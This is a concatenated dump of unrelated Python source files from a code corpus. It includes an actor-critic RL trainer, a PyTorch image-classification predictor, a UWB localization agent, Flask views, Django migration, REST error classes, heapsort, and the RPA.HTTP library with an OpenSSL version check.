AC_Network = ActorCriticNeural(name=name, device=DEVICE, state_size=STATE_SIZE,
nb_actions=NB_ACTONS, lr=LEARNING_RATE,
dropout= DROPOUT).to(DEVICE)
# Try to restore more recent model if exist
mod_lst = os.listdir('{}/model'.format(name))
restored = False
if len(mod_lst) > 0:
mod_lst_idx = []
for itm in mod_lst:
try:
mod_lst_idx.append(int(itm.replace('.pt', '')))
except:
pass
max_idx = max(mod_lst_idx)
print('Already existing model found, try to restore idx {}'.format(max_idx))
try:
AC_Network.restore(add=max_idx)
print('Model successfully restored')
except:
print('Fail to restore existing model. Maybe corrupted? ')
exit(-1)
if GRAPHICAL:
env.render(mode='human')
start_epi_idx = 0
# Retore last index from tracking if restored model
if restored:
df = pd.read_csv('{}/tracking.csv', sep=';', header=None).numpy()
start_epi_idx = int(df[:, 0])
end_epi_idx = start_epi_idx + NB_EPISODE
# A learner object to perform learning steps
learner_obj = Learner(model=AC_Network, discounter=DISCOUNT)
# Main loop
track_duration = []
track_reward = []
entropy_term = 0
for e in range(start_epi_idx, end_epi_idx):
print('======= Episode {}/{} ========='.format(e, end_epi_idx))
# Store actions log probs and rewards
tot_log_prbs = []
tot_rewards = []
tot_critic_val = []
tot_entropy = []
# Reinit the env
obs = torch.Tensor(env.reset()).to(DEVICE)
# Episode loop
epi_idx = 0
while epi_idx < MAX_EPI_LEN:
if GRAPHICAL:
time.sleep(TIME_STEP)
# Get actions probs
AC_Network.train()
critic_val, prbs = AC_Network.forward(obs.view(1, STATE_SIZE))
# To numpy
np_prbs = prbs.cpu().detach().numpy()
#np_val = prbs.cpu().detach().numpy()
tot_critic_val.append(critic_val)
# Chose the next action according to probability distribution
action = np.random.choice(NB_ACTONS, p=np.squeeze(np_prbs))
# Get actuator value
actuator_val = AC_Network.actions[action]
# Get log probs of the chosen action
log_prbs = torch.log(prbs.squeeze(0)[action])
tot_log_prbs.append(log_prbs)
# Compute the entropy of the prediction
entropy = Categorical(probs=prbs).entropy()
tot_entropy.append(entropy)
#entropy = -np.sum(np.mean(np_prbs) * np.log(np_prbs))
#entropy_term += entropy
# Perform the action
new_obs, r, done, _ = env.step([actuator_val])
obs = torch.Tensor(new_obs).to(DEVICE)
tot_rewards.append(r)
# If end of the episode:
if done or epi_idx == MAX_EPI_LEN - 1:
track_duration.append(epi_idx)
track_reward.append(np.sum(tot_rewards))
file = open('{}/tracking.csv'.format(name), 'a')
file.write('{};{};{};{}\n'.format(e, track_duration[-1], track_reward[-1], entropy.cpu().detach().item()))
file.close()
print('Episode {} : Duration {} - Total reward {} - Entropy: {}'.format(e, track_duration[-1],
track_reward[-1],
entropy.cpu().detach().item()))
if len(track_duration) > 10:
print('AVG 10 last duration: {} / Rewards: {}'.format(np.mean(track_duration[-10:-1]),
np.mean(track_reward[-10:-1])))
break
epi_idx += 1
# Computing cumulative rewards
cum_rew = np.zeros(len(tot_rewards))
idx = len(tot_rewards) - 1
cum_rew[idx] = tot_rewards[idx]
while idx > 0:
idx -= 1
cum_rew[idx] = tot_rewards[idx] + DISCOUNT * cum_rew[idx + 1]
# Actor critic update:
val = torch.stack(tot_critic_val).to(DEVICE)
cum_rew = torch.Tensor(cum_rew).to(DEVICE)
log_prbs = torch.stack(tot_log_prbs).to(DEVICE)
# Get the advantage
adv = cum_rew - val
# Compute the general loss
final_entropy = torch.stack(tot_entropy).mean()
print('entropy: ', final_entropy.cpu().detach().item())
loss = torch.mean((-1 * log_prbs) * adv) + (0.5 * torch.mean(adv ** 2)) + (100 / (final_entropy+1e-8))
# Optimize
AC_Network.optimizer.zero_grad()
loss.backward()
AC_Network.optimizer.step()
print('loss: ', loss.cpu().detach().item())
entropy_term = 0
# Model saving
if e % SAVE_INTERVAL == 0 and e != 0:
AC_Network.save(add=e)
if __name__ == "__main__":
trainer() |
997,724 | 9b24745bd13c8c1c765eeb98e97283123f95a46a | import os
import tqdm
import json
import argparse
import torch
import numpy as np
import pandas as pd
# from functools import partial
# from multiprocessing.pool import ThreadPool
from torch.utils.data import DataLoader
from models.smp import SegmentModel, ClassifyModel
from datasets.inference import InferenceDataset
from datasets.classify import SegmentBasedClassifyDataset
from utils.postprocess import DilateSigmoidPostProcess
from utils.postprocess import DilateSoftmaxPostProcess
def predict(Model, Dataset):
args = parse_args()
cls_prefix = args.cls_prefix
with open(args.config_path) as f:
cfg = json.load(f)
cfg["model"]["load_ckpt"] = True
assert cfg["model"]["load_ckpt"]
model = get_model(cfg, Model)
dataset = get_dataset(args, cfg, Dataset)
if "DilateSigmoidPostProcess" in cfg["postprocess"]:
postprocess = DilateSigmoidPostProcess([1, 1])
elif "DilateSoftmaxPostProcess" in cfg["postprocess"]:
postprocess = DilateSoftmaxPostProcess([1, 1])
Predictor(
args=args,
cfg=cfg,
model=model,
dataset=dataset,
postprocess=postprocess,
cls_prefix=cls_prefix,
)
def get_model(cfg, Model):
print(cfg["model"])
model = Model(cfg["model"])
return model
def get_dataset(args, cfg, Dataset):
print("Prepare dataset...")
print(cfg["dataset"])
# cfg["dataset"]["mask_file_postfix"] = ""
cfg["dataset"]["catheters"] = "total"
valid_path = args.data_path
valid_set = Dataset(
valid_path,
**cfg["dataset"],
is_train=False,
)
return valid_set
class Predictor:
def __init__(
self,
args,
cfg,
model,
dataset,
postprocess,
cls_prefix,
):
print("Setting Arguments...", args)
self.args = args
self.cfg = cfg
self.cls_prefix = cls_prefix
self.cls_output = []
self.cls_target = []
self.path_list = []
self.data_path = self.args.data_path
self.batch_size = 64
self.set_device()
self.load_checkpoint()
self.prepare_model(model, postprocess)
self.prepare_datapipeline(dataset)
self.predict()
def set_device(self):
self.device = "cuda"
def load_checkpoint(self):
if self.args.checkpoint is not None:
print("Load checkpoint...", self.args.checkpoint)
self.state = torch.load(self.args.checkpoint)
else:
print("No checkpoint will be loaded.")
def prepare_model(self, model, postprocess):
print("Prepare model...")
print("Model configuring...")
cfg = self.cfg["model"]
self.model = model
self.model.encoder = torch.nn.DataParallel(
self.model.encoder,
# device_ids=self.device_ids,
)
if hasattr(model, "decoder"):
self.model.decoder = torch.nn.DataParallel(
self.model.decoder,
# device_ids=self.device_ids,
)
self.model.classification_head = torch.nn.DataParallel(
self.model.classification_head,
# device_ids=self.device_ids,
)
self.model = self.model.to(self.device, dtype=torch.float32)
if cfg["load_ckpt"]:
print("Load model state...")
self.model.load_state_dict(self.state["model"], strict=False)
else:
print("No model state dict will be loaded.")
self.postprocess = postprocess
def prepare_datapipeline(self, dataset):
self.dataset = dataset
# prepare dataloader
print("Prepare dataloader...")
self.dataloader = DataLoader(
self.dataset,
batch_size=self.batch_size,
shuffle=False,
num_workers=32,
drop_last=False,
prefetch_factor=1,
)
def predict(self):
print("Start predicting...")
with torch.no_grad():
self.model.eval()
num_batchs = len(self.dataloader)
for row, inputs, target in tqdm.tqdm(self.dataloader,
total=num_batchs):
for k in inputs:
inputs[k] = inputs[k].to("cuda")
# inference
output = self.model(inputs)
# post-process
output, target = self.postprocess(output, target)
self.update(row, output, target)
self.save_cls()
def update(self, row, output, target):
for k in output["cls"]:
output["cls"][k] = output["cls"][k].cpu().detach().numpy()
self.cls_output.append(output["cls"][k])
self.cls_target.append(target["cls"][k])
self.path_list.extend(row["Path"])
def save_cls(self):
cfg = self.cfg["dataset"]["findings"]
task_name = self.args.task_name
for k in cfg:
print(cfg[k])
output = np.concatenate(self.cls_output, axis=0)
output = pd.DataFrame(output, columns=cfg[k])
target = np.concatenate(self.cls_target, axis=0)
target = pd.DataFrame(target, columns=cfg[k])
output["Path"] = self.path_list
target["Path"] = self.path_list
output.to_csv(
f"./results/{task_name}/{self.cls_prefix}_output.csv",
index=False)
target.to_csv(
f"./results/{task_name}/{self.cls_prefix}_target.csv",
index=False)
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument(
"--cls_prefix",
type=str,
)
parser.add_argument(
"--task_name",
type=str,
)
parser.add_argument(
'--gpus',
type=str,
help='specify which GPUs to use.',
)
parser.add_argument(
'--workers',
type=int,
default=32,
help='number of workers',
)
parser.add_argument(
'--checkpoint',
type=str,
default=None,
help='pytorch checkpoint file path',
)
parser.add_argument(
"--config_path",
type=str,
)
parser.add_argument(
"--data_path",
type=str,
)
return parser.parse_args()
if __name__ == "__main__":
predict(ClassifyModel, SegmentBasedClassifyDataset)
|
997,725 | 164e05981b0733702ac4cb9c230a1dbfe0e9e76a | #!/usr/bin/env python
from shapely.geometry import Point, LineString, Polygon
import math
import numpy as np
import matplotlib.pyplot as plt
class uwb_agent:
def __init__(self, ID, pos):
self.id = ID
self.pos = pos
self.incidenceMatrix = np.array([])
self.M = [self.id]
self.N = []
self.E = []
self.P = []
self.pairs = []
self.I = np.array([[1,0],[0,1]])
def get_distance(self, remote_pos):
p1 = self.pos
p2 = remote_pos
dist = math.sqrt( (p2.x - p1.x)**2 + (p2.y - p1.y)**2 )
return dist
def update_incidenceMatrix(self):
self.incidenceMatrix = np.array([])
self.P = []
rows = len(self.M)
cols = len(self.pairs)
self.incidenceMatrix = np.zeros((rows,cols), dtype=int)
for i, pair in enumerate(self.pairs):
col = np.zeros(rows, dtype=int)
m1 = pair[0]
m2 = pair[1]
col[m1] = 1
col[m2] = -1
self.incidenceMatrix[:,i] = col.T
self.P.append(pair[2])
def add_nb_module(self, Id, range):
if not any(x == Id for x in self.N):
self.N.append(Id)
self.E.append(range)
self.M.append(Id)
self.pairs.append([self.id, Id, range])
else:
self.E[Id] = range
for pair in self.pairs:
if any(x == Id for x in pair) and any(x == self.id for x in pair):
pair[2] = range
def add_pair(self, Id1, Id2, range):
pairs_present = 0
for i, pair in enumerate(self.pairs):
if (pair[0] == Id1 and pair[1] == Id2) or (pair[1] == Id1 and pair[0] == Id2):
self.pairs[i][2] = range
else:
pairs_present += 1
if pairs_present <= len(self.pairs):
self.pairs.append([Id1, Id2, range])
def handle_range_msg(self, Id, nb_pos):
range = self.get_distance(nb_pos)
self.add_nb_module(Id, range)
self.update_incidenceMatrix()
def handle_other_msg(self, Id1, Id2, range):
self.add_pair(Id1, Id2, range)
self.update_incidenceMatrix()
def define_triangle(self,a,b,c):
angle_a = math.acos( (b**2 + c**2 - a**2) / (2 * b * c) )
angle_b = math.acos( (a**2 + c**2 - b**2) / (2 * a * c) )
angle_c = math.acos( (a**2 + b**2 - c**2) / (2 * a * b) )
A = Point(0.0, 0.0)
B = Point(c, 0.0)
C = Point(b*math.cos(angle_a), b*math.sin(angle_a))
return A, B, C, angle_a, angle_b, angle_c
def define_rectangle(self):
a,b,c,d,e,f = self.P
A,B,C,angle_a1,angle_b1,_ = self.define_triangle(a,b,c)
angle_a2 = math.acos( (b**2 + c**2 - a**2) / (2 * b * c) )
#angle_b2 = math.acos( (a**2 + c**2 - b**2) / (2 * a * c) )
#angle_c1 = math.acos( (b**2 + d**2 - e**2) / (2 * b * d) )
#angle_c2 = math.acos( (a**2 + d**2 - f**2) / (2 * a * d) )
#angle_d1 = math.acos( (e**2 + d**2 - b**2) / (2 * e * d) )
#angle_d2 = math.acos( (f**2 + d**2 - a**2) / (2 * f * d) )
D = Point(b*math.cos(angle_a2), -b*math.sin(angle_a2))
return A,B,C,D
def run():
pass
if __name__ == "__main__":
A = uwb_agent(ID=0, pos=Point(0,0))
B = uwb_agent(ID=1, pos=Point(3,4))
C = uwb_agent(ID=2, pos=Point(1,5))
D = uwb_agent(ID=3, pos=Point(6,2))
A.handle_range_msg(Id=B.id, nb_pos=B.pos)
A.handle_range_msg(Id=C.id, nb_pos=C.pos)
A.handle_range_msg(Id=D.id, nb_pos=D.pos)
A.handle_other_msg(Id1=B.id, Id2=C.id, range=B.get_distance(C.pos))
A.handle_other_msg(Id1=B.id, Id2=D.id, range=B.get_distance(D.pos))
A.handle_other_msg(Id1=C.id, Id2=D.id, range=C.get_distance(D.pos))
p1, p2, p3, p4 = A.define_rectangle()
x = [p1.x, p2.x, p3.x, p4.x]
y = [p1.y, p2.y, p3.y, p4.y]
print("A: ", p1.x, p1.y, " B: ", p2.x, p2.y, " C: ", p3.x, p3.y, " D: ", p4.x, p4.y)
print(A.pairs)
print(A.incidenceMatrix)
print(A.P)
plt.scatter(x,y)
plt.show()
|
997,726 | 832e2cf88094e76fbfa6264b0756bb9cae736b66 | import os
from dotenv import load_dotenv
load_dotenv()
CONFIG_PATH = os.path.dirname(os.path.realpath(__file__))
RESOURCES_FOLDER = os.path.join(CONFIG_PATH, 'resources')
WML_SERVICE_URL = os.getenv('WML_SERVICE_URL', 'https://us-south.ml.cloud.ibm.com')
WML_SERVICE_API_KEY = os.getenv('WML_SERVICE_API_KEY')
WML_SPACE_UID = os.getenv('WML_SPACE_UID')
WML_CREDENTIALS = {
"url": WML_SERVICE_URL,
"apikey": WML_SERVICE_API_KEY
}
WML_DEPLOYMENT_ID = os.getenv('WML_DEPLOYMENT_ID')
|
997,727 | 82fa5b9546ebb53a5d158aca6a771b17033365fc | import logging
logger = logging.getLogger('restserver.rest_core')
class ApiError(Exception):
_message = ''
def __init__(self, **kwargs):
self._message = kwargs.get('message', self._message)
def get_description(self):
return self._message
def get_dict(self):
info = self.get_log_information()
self.log(info)
return {
'Error': {
'ErrorCode': self.code,
'ErrorDescription': self.get_description(),
}
}
def get_log_information(self):
return '[%s] %d %s' % (self.__class__.__name__,
self.code,
self.get_description())
def log(self, message):
logger.info(message)
class EmptyError(ApiError):
code = 0
_message = ''
def log(self, message):
pass
class NoContent(ApiError):
code = 204
class BadRequest(ApiError):
code = 400
class WrongParameter(BadRequest):
_message = 'Invalid parameter %s.'
def __init__(self, **kwargs):
super(WrongParameter, self).__init__(**kwargs)
self.parameter = kwargs['parameter']
def get_description(self):
return self._message % self.parameter
class ParameterExpected(WrongParameter):
_message = 'Parameter %s expected.'
class UnauthorizedError(ApiError):
code = 401
_message = 'Authentication error.'
class NotEnoughMoney(ApiError):
code = 402
_message = 'Not enough money.'
class Forbidden(ApiError):
code = 403
class NotFound(ApiError):
code = 404
class Conflict(ApiError):
code = 409
class InternalServerError(ApiError):
code = 500
# _message = 'Internal server error: %s (%s)'
_message = 'Internal server error'
def __init__(self, **kwargs):
super(InternalServerError, self).__init__(**kwargs)
self.caught_error = kwargs.get('error')
# def get_description(self):
# return self._message % (self.caught_error, type(self.caught_error))
def log(self, message):
logger.exception(message)
class ServiceUnavailable(InternalServerError):
code = 503
_message = 'Third-party service is unavailable'
|
997,728 | f9e1ab8945f0dfb175c14633cc03aaea24df239c | from unittest import TestCase
from recommender import Recommender
# TODO: write proper testcases
class AllInOne(TestCase):
def recommend(self):
recom = Recommender(documents_n = 20, persons_n = 20)
for vizit in Data():
recom.record(vizit[0], vizit[1])
self.assertEqual(recom.recommend('430586149'), ['433940066', '431329924', '433862262'])
class Data(object):
def __iter__(self):
raw = self.raw().split('\n')
for line in raw:
yield line.split(',')
def raw(self):
return """430592357,ZvCTasj4
430586149,ZvCTasj4
201397816,ZyrCGvQQ
214597966,ZSV4Hkiw
430584391,zy0RUZnG
431065083,ZvCTasj4
201361464,ZyrCGvQQ
302482929,ZSV4Hkiw
330117582,ZvCTasj4
433862262,ZSOmPzCw
426482194,ZSOmPzCw
425224044,ZSOmPzCw
201369542,ZzVi46JN
363734570,ZZS1KlwN
431246574,ZxqvpImX
431249575,ZxqvpImX
201359004,ZzVi46JN
430466714,zy0RUZnG
319731179,ZxqvpImX
431246574,zXRRGKfX
430716481,zXRRGKfX
201362184,Zsl8FsLx
430466714,zXRRGKfX
324918927,ZSV4Hkiw
201361657,ZzVi46JN
424384375,ZSOmPzCw
431293112,ZSV4Hkiw
430519225,ZzVi46JN
330117582,ZYw24l7D
382903817,ZvAD7jk3
201423486,ZvAD7jk3
433862262,zwBr9yLl
430347776,zXRRGKfX
250683776,zXHGOep9
390255494,zXHGOep9
336148236,zXHGOep9
419502781,ZvAD7jk3
433178444,zwBr9yLl
412161719,ZvAD7jk3
429615716,zy0RUZnG
431246574,ZYw24l7D
201377744,ZYw24l7D
433650250,zwBr9yLl
431293112,zXHGOep9
425225457,zy0RUZnG
391386058,ZTJaUd81
422313668,ZTJaUd81
201369659,ZY1KyJuH
431293112,ZTJaUd81
201379948,ZY1KyJuH
430716481,ZTJaUd81
201366382,zWNxGYWo
201357695,ZY1KyJuH
433862262,Zsl8FsLx
430651758,ZWSlLHdc
431304967,Zsl8FsLx
201360390,ZY1KyJuH
430716481,Zsl8FsLx
430658308,ZWSlLHdc
330117582,ZWSlLHdc
431065083,ZWSlLHdc
431246574,ZxqvpImX
433178444,Zt3n32p0
250683776,Zt3n32p0
319731179,zWNxGYWo
330117582,Zt3n32p0
430347776,Zt3n32p0
201362419,zWNxGYWo
412161719,Zv8Uozhb
433862262,ZSnRUCB6
433178444,ZSnRUCB6
431329924,ZSnRUCB6
431293112,ZSnRUCB6
201366382,zWNxGYWo
201397816,ZyrCGvQQ
201366633,ZyrCGvQQ
422313668,Zv8Uozhb
363734570,Zv8Uozhb
371894284,Zv8Uozhb
429110215,zUl2imWb
430609436,ZZS1KlwN
433862262,zxKKxPIY
431304967,ZYnhGo6X
201361023,zUl2imWb
201382402,ZYw24l7D
433862262,ZYnhGo6X
429615716,ZZS1KlwN
201379347,zxKKxPIY
422313668,ZZS1KlwN
201359861,zxKKxPIY
201361844,zxKKxPIY
201721820,zUl2imWb
431244481,ZYnhGo6X
431293112,zUl2imWb
201358641,zwBr9yLl
201362419,ZYnhGo6X
433940066,zyYIkGkk
433862262,zyYIkGkk
431329924,zyYIkGkk
430586149,zyYIkGkk"""
|
997,729 | 815654909ee73aa3e4ffb8487d1aebf82b21ba9c | # Generated by Django 2.0.3 on 2018-04-20 20:18
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('forum', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('com_title', models.CharField(max_length=140)),
('com_body', models.CharField(max_length=500)),
],
),
migrations.AlterField(
model_name='post',
name='body',
field=models.CharField(max_length=500),
),
migrations.AddField(
model_name='comment',
name='post',
field=models.ForeignKey(on_delete=None, related_name='comments', to='forum.Post'),
),
]
|
997,730 | 53c64ab2738c849239e19b267ffb7589d14947e1 | from collections import defaultdict
with open('perf.txt', 'r') as f:
perfs = f.readlines()
domains = ['Video_Games', 'Books', 'Toys_Games', 'Tools_Home_Improvement', 'Amazon_Instant_Video', 'Movies_TV', 'Electronics', 'Health',
'Shoes', 'Baby', 'Automotive', 'Software', 'Sports_Outdoors', 'Clothing_Accessories', 'Beauty', 'Patio', 'Music',
'Pet_Supplies', 'Office_Products', 'Home_Kitchen']
#word_embeddings = ['embeddings_snap_s256_e15.txt', 'embeddings_snap_s256_e50.txt', 'embeddings_snap_s256_e30.txt',
# 'embeddings_snap_s512_e15.txt', 'embeddings_snap_s128_e15.txt', 'embeddings_snap_s128_e30.txt',
# 'embeddings_snap_s128_e50.txt', 'embeddings_snap_s512_e50.txt', 'embeddings_snap_s512_e30.txt']
word_embeddings = ['embeddings_snap_s512_e15.txt', 'embeddings_snap_s128_e15.txt', 'embeddings_snap_s128_e30.txt',
'embeddings_snap_s128_e50.txt', 'embeddings_snap_s512_e50.txt', 'embeddings_snap_s512_e30.txt']
it = 0
perf_dict = defaultdict(list)
for i, emb in enumerate(word_embeddings):
for j, domain in enumerate(domains):
perf = perfs[it].replace('\n', '').strip().split(':')[-1][0:5]
it = it + 1
perf_dict[domain].append(perf)
for dom in domains:
print (dom + ':' +'&'.join(perf_dict[dom]))
|
997,731 | 9634f8c206d56a1597fc1f251e09fcb38f4f8ad0 | from flask import render_template, flash, redirect, session, url_for, request, g
from flask.ext.login import login_user, logout_user, current_user, login_required
from app import app, db, lm
from forms import LoginForm
from models import User, Post, FlickrAccount, Account, PhotoAlbum
import glob
import json
import traceback
import flickr_api
@lm.user_loader
def load_user(id):
return User.query.get(int(id))
@app.before_request
def before_request():
g.user = current_user
@app.route('/')
@app.route('/index')
def index():
user = g.user
posts = Post.query.order_by(Post.timestamp.desc())
photo_urls = []
try:
albums = PhotoAlbum.query.order_by(PhotoAlbum.id)
except Exception as e:
traceback.print_exc()
print str(e)
return render_template('home.html', albums=albums, posts=posts, photo_urls=json.dumps(photo_urls))
@app.route('/login', methods = ['GET', 'POST'])
def login():
if g.user is not None and g.user.is_authenticated():
return redirect(url_for('index'))
form = LoginForm()
if form.validate_on_submit():
print "Form submitted and everyting was good?"
if form.get_user():
login_user(form.get_user())
return redirect(url_for('admin'))
return render_template('login.html',
title = 'Sign In',
form = form)
@app.route('/logout')
def logout():
logout_user()
return redirect(url_for('index'))
@app.route('/code')
def code():
return render_template('code.html')
@app.route('/about')
def about():
return render_template('about.html')
@app.route('/running')
def running():
return render_template('running.html')
@app.route('/photography/album/<id>')
def photo_album(id):
try:
album = PhotoAlbum.query.get(id)
except Exception as e:
traceback.print_exc()
print str(e)
return render_template('album.html', album=album)
|
997,732 | abe95463e187e0de0287c0c3c80d8dac7eda21cf | from math import floor
def troca(a,
i,
j):
a[i], a[j] = a[j], a[i]
def arruma_heap(a,
inicio,
fim):
raiz = inicio
while raiz * 2 + 1 <= fim:
filho = raiz * 2 + 1
trocar = raiz
if a[trocar] < a[filho]:
trocar = filho
if filho + 1 <= fim and a[trocar] < a[filho + 1]:
trocar = filho + 1
if trocar == raiz:
break
else:
troca(a, raiz, trocar)
raiz = trocar
def cria_heap(a,
tamanho):
inicio = floor((tamanho - 2)/2)
while inicio >= 0:
arruma_heap(a, inicio, tamanho -1)
inicio -= 1
def heap_sort(a,
tamanho):
cria_heap(a, tamanho)
fim = tamanho - 1
while fim > 0:
troca(a, 0, fim)
fim = fim - 1
arruma_heap(a, 0, fim)
lista = [5, 8, 2, 45, 6, 5, 3]
heap_sort(lista, 7)
print(lista) |
997,733 | 54deca45c972bfad5b5b83e4893b6e66610f73c9 | # pylint: disable=C0411,C0412,C0413
import logging
from pathlib import Path
import re
from typing import Any, Optional, Union, List
from urllib.parse import urlparse
import RequestsLibrary.log
from RequestsLibrary.utils import is_file_descriptor
from robot.api import logger
from RPA.core.notebook import notebook_file
from RPA.FileSystem import FileSystem
LOG_CHAR_LIMIT = 10000
def log_response(response):
logger.debug(
"%s Response : url=%s \n " % (response.request.method.upper(), response.url)
+ "status=%s, reason=%s \n " % (response.status_code, response.reason)
+ "headers=%s \n " % response.headers
+ "body=%s \n " % format_data_to_log_string(response.text)
)
def log_request(response):
request = response.request
if response.history:
original_request = response.history[0].request
redirected = "(redirected) "
else:
original_request = request
redirected = ""
logger.debug(
"%s Request : " % original_request.method.upper()
+ "url=%s %s\n " % (original_request.url, redirected)
+ "path_url=%s \n " % original_request.path_url
+ "headers=%s \n " % original_request.headers
+ "body=%s \n " % format_data_to_log_string(original_request.body)
)
def format_data_to_log_string(data, limit=LOG_CHAR_LIMIT):
if not data:
return None
if is_file_descriptor(data):
return repr(data)
if len(data) > limit and logging.getLogger().level > 10:
data = (
"%s... (set the log level to DEBUG or TRACE to see the full content)"
% data[:limit]
)
return data
RequestsLibrary.log.log_response = log_response
RequestsLibrary.log.log_request = log_request
from RequestsLibrary import RequestsLibrary # noqa: E402
# NOTE. Above logging changes are related to. Especially on Automation Studio
# extensive INFO level logging makes readability problematic.
# https://github.com/MarketSquare/robotframework-requests/issues/353
class HTTP(RequestsLibrary):
"""The *RPA.HTTP* library extends functionality of the `RequestsLibrary`_.
See that documentation for several examples of how to issue ``GET``
requests and utilize the returned ``result`` objects.
.. _RequestsLibrary: https://marketsquare.github.io/robotframework-requests/doc/RequestsLibrary.html
This extension provides helper keywords to get an HTTP resource on a
session. The ``HTTP Get`` and ``Download`` keywords will initiate a
session if one does not exist for the provided URL, or use an existing
session. When using these keywords, you do not need to manage
sessions with ``Create Session``. Session management is still
required if you use the underlying session keywords, e.g.,
``* On Session``.
""" # noqa: E501
ROBOT_LIBRARY_SCOPE = "GLOBAL"
ROBOT_LIBRARY_DOC_FORMAT = "reST"
def __init__(self, *args, **kwargs) -> None:
RequestsLibrary.__init__(self, *args, **kwargs)
self.logger = logging.getLogger(__name__)
self.fs = FileSystem()
self.session_alias_prefix = "rpasession_alias."
self.current_session_alias = None
def http_get(
self,
url: str,
target_file: Optional[str] = None,
verify: Union[bool, str] = True,
force_new_session: bool = False,
overwrite: bool = False,
stream: bool = False,
**kwargs,
) -> dict:
"""
A helper method for ``Get Request`` that will create a session, perform GET
request, and store the target file, if set by the ``target_file`` parameter.
The old session will be used if the URL scheme and the host are the same as
previously, e.g., 'https://www.google.fi' part of the URL.
.. code-block:: robotframework
*** Settings ***
Library RPA.HTTP
*** Variables ***
${DOWNLOAD_PATH}= ${OUTPUT DIR}${/}downloads
${WORD_EXAMPLE}= https://file-examples.com/wp-content/uploads/2017/02/file-sample_100kB.doc
${EXCEL_EXAMPLE}= https://file-examples.com/wp-content/uploads/2017/02/file_example_XLS_10.xls
*** Tasks ***
Download files with reused session
# Starts a new session
HTTP Get ${WORD_EXAMPLE} target_file=${DOWNLOAD_PATH}${/}word-example.doc
# Uses the previous session
HTTP Get ${EXCEL_EXAMPLE} target_file=${DOWNLOAD_PATH}${/}excel-example.xls
:param url: target URL for GET request
:param target_file: filepath to save request content, default ``None``
:param verify: if SSL verification should be done, default ``True``,
a CA_BUNDLE path can also be provided
:param force_new_session: if new HTTP session should be created,
default ``False``
:param overwrite: used together with ``target_file``, if ``True`` will overwrite
the target file, default ``False``
:param stream: if ``False``, the response content will be immediately downloaded
:return: request response as a dict
""" # noqa: E501
uc = urlparse(url)
http_host = f"{uc.scheme}://{uc.netloc}"
request_alias = f"{self.session_alias_prefix}{uc.scheme}{uc.netloc}"
url_path = url.replace(http_host, "")
if force_new_session or not self.session_exists(request_alias):
self.logger.info("Creating a new HTTP session")
self.create_session(request_alias, http_host, verify=verify)
else:
self.logger.info("Using already existing HTTP session")
self.current_session_alias = request_alias
response = self.get_on_session(request_alias, url_path, stream=stream, **kwargs)
if target_file is not None:
self._create_or_overwrite_target_file(
target_file, response.content, overwrite
)
return response
def _create_or_overwrite_target_file(
self,
path: str,
response: Any,
overwrite: bool,
) -> None:
CHUNK_SIZE = 32768
Path(path).parent.mkdir(parents=True, exist_ok=True)
file_exists = Path(path).is_file()
if not file_exists or (file_exists and overwrite):
with open(path, "wb") as f:
for chunk in response.iter_content(CHUNK_SIZE):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
notebook_file(path)
def get_current_session_alias(self) -> str:
"""Get request session alias that was used with the ``HTTP Get`` keyword.
:return: name of session alias as a string
"""
return self.current_session_alias
def download(
self,
url: str,
target_file: Optional[str] = None,
verify: Union[bool, str] = True,
force_new_session: bool = False,
overwrite: bool = False,
stream: bool = False,
**kwargs,
) -> dict:
"""An alias for the ``HTTP Get`` keyword.
The difference in use is that the URL is always downloaded based on
the URL path (even without ``target_file``). If there is a filename
in the path, then that is used as ``target_file`` to save to. By default,
the filename will be "downloaded.html".
.. code-block:: robotframework
*** Settings ***
Library RPA.HTTP
*** Variables ***
${DOWNLOAD_PATH}= ${OUTPUT DIR}${/}downloads
${WORD_EXAMPLE}= https://file-examples.com/wp-content/uploads/2017/02/file-sample_100kB.doc
${EXCEL_EXAMPLE}= https://file-examples.com/wp-content/uploads/2017/02/file_example_XLS_10.xls
*** Tasks ***
Download files with reused session with provided file names
# Starts a new session
Download ${WORD_EXAMPLE} target_file=${DOWNLOAD_PATH}
# Uses the previous session
Download ${EXCEL_EXAMPLE} target_file=${DOWNLOAD_PATH}
# Above files are downloaded using the same names as they have
# on the remote server.
:param url: target URL for GET request
:param target_file: filepath to save request content, default ``None``
:param verify: if SSL verification should be done, default ``True``,
a CA_BUNDLE path can also be provided
:param force_new_session: if new HTTP session should be created,
default ``False``
:param overwrite: used together with ``target_file``, if ``True`` will overwrite
the target file, default ``False``
:param stream: if ``False`` the response content will be immediately downloaded
:return: request response as a dict
""" # noqa: E501
response = self.http_get(
url,
verify=verify,
force_new_session=force_new_session,
overwrite=overwrite,
stream=stream,
**kwargs,
)
dirname = Path()
filename = None
if target_file is not None:
target = Path(target_file)
if target.is_dir():
dirname = target
else:
dirname = target.parent
filename = target.name
if filename is None:
filename = urlparse(url).path.rsplit("/", 1)[-1] or "downloaded.html"
self._create_or_overwrite_target_file(dirname / filename, response, overwrite)
return response
def check_vulnerabilities(self) -> List:
"""Check for possible vulnerabilities in the installed runtime
environment packages.
Currently will check only for OpenSSL version and outputs warning message on any
discovered vulnerability.
:return: list of all check results
.. code-block:: robotframework
*** Tasks ***
Vulnerability Check
${results}= Check Vulnerabilities
FOR ${result} IN @{results}
Log To Console TYPE: ${result}[type]
Log To Console VULNERABLE: ${result}[vulnerable]
Log To Console MESSAGE: ${result}[message]
END
"""
all_results = []
vulnerable, message = self._check_openssl_vulnerabilities()
all_results.append(
{"type": "OpenSSL", "vulnerable": vulnerable, "message": message}
)
if vulnerable:
self.logger.warning(message)
return all_results
def _check_openssl_vulnerabilities(self):
message = "No OpenSSL detected"
try:
import ssl # pylint: disable=C0415
open_ssl_version = re.match(
r"OpenSSL (\d+)\.(\d+)\.(\d+).*", ssl.OPENSSL_VERSION
)
if open_ssl_version and len(open_ssl_version.groups()) == 3:
major, minor, fix = [int(val) for val in open_ssl_version.groups()]
if major == 3 and minor == 0 and (0 <= fix <= 6):
return True, (
rf"Dependency with HIGH severity vulnerability detected: '{ssl.OPENSSL_VERSION}'. " # noqa: E501
"For more information see https://robocorp.com/docs/faq/openssl-cve-2022-11-01" # noqa: E501
)
message = ssl.OPENSSL_VERSION
except ImportError:
pass
return False, message
|
997,734 | bad4bc972d735eb9f96cea8fcb6eb4b004cd4a54 | import cv2 # import OpenCV module.
from matplotlib import pyplot as plt # import matplotlib
# Step 1
